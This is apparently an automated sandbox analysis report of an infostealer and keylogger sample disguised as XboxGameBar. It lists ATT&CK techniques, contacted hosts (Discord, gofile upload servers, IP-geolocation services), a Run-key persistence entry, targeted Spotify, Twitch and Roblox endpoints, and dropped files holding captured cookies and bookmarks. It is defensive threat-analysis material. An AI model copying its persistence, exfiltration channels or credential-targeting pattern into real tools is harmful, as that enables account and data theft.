                      | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                      | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                      | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 31 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
                      [Behavior graph: ID 1556386; Sample: RuntimeusererVers.exe; Start date: 15/11/2024; Architecture: WINDOWS; Score: 100]

                      SourceDetectionScannerLabelLink
                      RuntimeusererVers.exe39%ReversingLabsWin64.Trojan.Generic
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe39%ReversingLabsWin64.Trojan.Generic
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.138.232 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | |
geolocation-db.com | 159.89.102.253 | true | true | |
store1.gofile.io | 45.112.123.227 | true | false | |
api.gofile.io | 45.112.123.126 | true | false | |

Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/json | false | |
https://api.gofile.io/getServer | false | |
https://geolocation-db.com/json/ | false | |
                                                                                                                                                    https://mahler:8092/site-updates.pyRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      https://cdn.discordapp.com/avatars/u.pngu.gifTRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://cdn.nest.rip/uploads/53ad50f6-06dc-4aa1-9677-ca47ce96abe2.pngwRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://github.com/urllib3/urllib3/issues/2680TRuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              https://github.com/urllib3/urllib3/issues/2920RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJpRuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://.cssRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://requests.readthedocs.ioa__url__u2.31.0a__version__l1RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://www.spotify.com/api/account-settings/v1/profileRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://github.com/urllib3/urllib3/issues/3020aNotOpenSSLWarningaOPENSSL_VERSION_INFOTRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://www.pyopenssl.orgRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://ch.search.yahoXRuntimeusererVers.exe, 00000003.00000003.1667928239.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1420294470.0000022335196000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717994360.0000022335188000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1669198355.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1648622407.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1719006635.000002233518E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization).RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://i.hizliresim.com/qxnzimj.jpgaresponseausernameaemailaregionalocaleamfaaverifieduUSERNAME:avaRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://www.attrs.org/en/stable/changelog.html)RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://www.iana.org/time-zones/repository/tz-link.htmlRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                                      https://www.attrs.org/en/stable/comparison.html#customization)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://cdn.nest.rip/uploads/84415d69-e663-4ba9-9112-fb2e1b80a759.jpguCREATIONRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          http://.jpgRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://github.com/python-attrs/attrs/issues/1107)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://github.com/python-attrs/attrs/issues/1099)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                                                  https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://media.discordapp.net/RuntimeusererVers.exe, 00000003.00000003.1672021008.0000022335189000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1667928239.0000022335180000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1669198355.0000022335180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://www.python.org/RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://cdn.nest.rip/uploads/4686538b-da3c-416e-bc82-f71b09908cb0.pnguPRIME:uBITS:aTwtichAccountsuRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Variomedia.svgRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://github.com/python-attrs/attrs/issuesRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://gql.twitch.tv/gqlRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://github.com/facebook/zstd/blob/dev/lib/zstd.h).RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://twitter.com/RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://nuitka.net/info/segfault.htmlforRuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338755146.00007FF7E225D000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                                                                      https://scriptkid.lolRuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://google.com/mail/RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://bugs.python.org/issue42195.RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://google.com/mail/RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.000002233426A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://github.com/python-attrs/attrs/issues/1105)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://github.com/python-attrs/attrs/issues/993)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://pypi.org/project/attrs/)RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://economy.roblox.com/v1/users/RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://www.openssl.org/docs/manmaster/man5/RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpfalse
IP               Domain              Country        ASN    ASN Name            Malicious
208.95.112.1     ip-api.com          United States  53334  TUT-ASUS            false
162.159.136.232  unknown             United States  13335  CLOUDFLARENETUS     false
162.159.138.232  discord.com         United States  13335  CLOUDFLARENETUS     false
45.112.123.126   api.gofile.io       Singapore      16509  AMAZON-02US         false
45.112.123.227   store1.gofile.io    Singapore      16509  AMAZON-02US         false
159.89.102.253   geolocation-db.com  United States  14061  DIGITALOCEAN-ASNUS  true
IP
127.0.0.1
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1556386
Start date and time:2024-11-15 10:45:13 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 15m 23s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:63
Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:RuntimeusererVers.exe
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.rans.spre.phis.troj.spyw.expl.evad.winEXE@113/224@5/7
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 40%
                                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                        • Execution Graph export aborted for target RuntimeusererVers.exe, PID 2956 because there are no executed function
                                                                                                                                                                                                                                        • Execution Graph export aborted for target RuntimeusererVers.exe, PID 7988 because there are no executed function
                                                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 5100 because it is empty
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                        • VT rate limit hit for: RuntimeusererVers.exe
Time | Type | Description
04:46:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XboxGameBar C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
04:46:20 | API Interceptor | 30x Sleep call for process: powershell.exe modified
04:46:20 | API Interceptor | 4x Sleep call for process: WMIC.exe modified
04:46:23 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XboxGameBar C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
04:46:44 | API Interceptor | 7596459x Sleep call for process: RuntimeusererVers.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
discord.com | HeilHitler.exe | malicious | Blank Grabber | 162.159.128.233
discord.com | file.exe | malicious | CStealer | 162.159.138.232
discord.com | B78DGDwttv.exe | malicious | SilverRat | 162.159.135.232
discord.com | YDW0S5K7hi.exe | malicious | SilverRat | 162.159.137.232
discord.com | cDRgXaadjD.exe | malicious | SilverRat | 162.159.128.233
discord.com | dens.exe | malicious | Python Stealer, Exela Stealer, Waltuhium Grabber | 162.159.128.233
discord.com | Xyq6rvzLJs.exe | malicious | SilverRat | 162.159.137.232
discord.com | 00514DIRyT.exe | malicious | GO Stealer | 162.159.136.232
discord.com | yuki.exe | malicious | Luna Stealer | 162.159.138.232
discord.com | CFuejz2dRu.exe | malicious | Discord Token Stealer | 162.159.135.232
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:@...e...........................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                                        Entropy (8bit):2.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:qn:qn
                                                                                                                                                                                                                                        MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                                                        SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                                                        SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                                                        SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:blat
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):452344
                                                                                                                                                                                                                                        Entropy (8bit):7.997816292350483
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:zT69nu5OZmTtds5tRgwa8fC4XdkAPWX4r4V+WXMZDB2Rtq:f6VuNt6tRgLxYdkzX4r4rXcB2Pq
                                                                                                                                                                                                                                        MD5:DC5EC863C04345327D2AE8FED55209B6
                                                                                                                                                                                                                                        SHA1:B23F36E0760FC11ED01294FD6DC767F44B35AC65
                                                                                                                                                                                                                                        SHA-256:3D498D4E145E38D7A4A65C230DC0E8240CB3CC8187C0A249EFE6FAA6B9509DCF
                                                                                                                                                                                                                                        SHA-512:5D9DC63E0AD2755714646E807AB248CED24E40743EAE4094F1B7378AF5DE0DC74E72C18DE38444655CA9EE4CEADEB10888A920BFE6E6D5A55BCECE2AAF1F09EC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):454
                                                                                                                                                                                                                                        Entropy (8bit):5.6874199989023495
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:4DIn6FMpJ+EVm3rY2bxbyv3r44NjIqbu1YIqyRHXmagzyCAuiDOq0pxjbIv:4Q6FMn+7JbI74ku1YIqimlFtqOTxjcv
                                                                                                                                                                                                                                        MD5:A305ABA9B0C0D2447627EBB1E90DBEDB
                                                                                                                                                                                                                                        SHA1:3941F7CE1798FA5621F81FEBB856BCC274F4346C
                                                                                                                                                                                                                                        SHA-256:80E3063ACBBC996F08471B341DF5B874C260FB696BA1E7A01B004D9041309B9D
                                                                                                                                                                                                                                        SHA-512:1D6269924EE1702B0C1CD23A34766FDB7DB8A9891684B0C410A37161D28BFA60FE0A59323841B6690F5E0BB0D657833E103B6B34B8E9778A49628F7B16EB3617
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....... scriptkid KeyLogger . https://scriptkid.lol | .........======================================================================...google.com.TRUE./.FALSE.13343565070843817.1P_JAR.2023-10-05-09...google.com.TRUE./.FALSE.13356784270843860.NID.511=lfE2Vn6ILT7VijDzEeQ7E2-WcCFI3koiTt40Tat-ZoveQCzLQNIH_rXzfWB54vEWybmaNRxITXOcCnjhl2RsSuhlZev-zYHRHJAkTOSXgQ4rpQpZHRrNCKlp2Q4N2yfvnVbdmOY5S4gOBWPvZrZOiPLdLoEjpjyr1IKWdaFiwQo..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):683
                                                                                                                                                                                                                                        Entropy (8bit):5.025722530126248
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:4Q6FMn0FNO493sMwH493szwvaacAhZmK17ob47L47iLJ2D1fEH8mPq7D7m:4AULxsMTxsaDBLsCQEwnm
                                                                                                                                                                                                                                        MD5:282341C08A6023A1619141350A9230A0
                                                                                                                                                                                                                                        SHA1:7245389D913F4C7908962FBDFF82F1D182486990
                                                                                                                                                                                                                                        SHA-256:2790732791977585173A475A7269D1878F30EAB21837277C711B5D8CF0C1E028
                                                                                                                                                                                                                                        SHA-512:D6C635E559BCBEFEAFCA1B90D95D42D2B957A3AF7B385302ED66D19DEEC9E891B9D423FBFA4BD409C656F4E8838DE2D488A884FD88CC9866F74AE14A1382ACED
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....... scriptkid KeyLogger . https://scriptkid.lol | .........======================================================================..1: https://support.mozilla.org/products/firefox..2: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize..3: https://www.mozilla.org/contribute/..4: https://www.mozilla.org/about/..5: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaign=new-users&utm_content=-global..6: https://www.mozilla.org/privacy/firefox/..7: https://www.mozilla.org/en-US/privacy/firefox/..
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
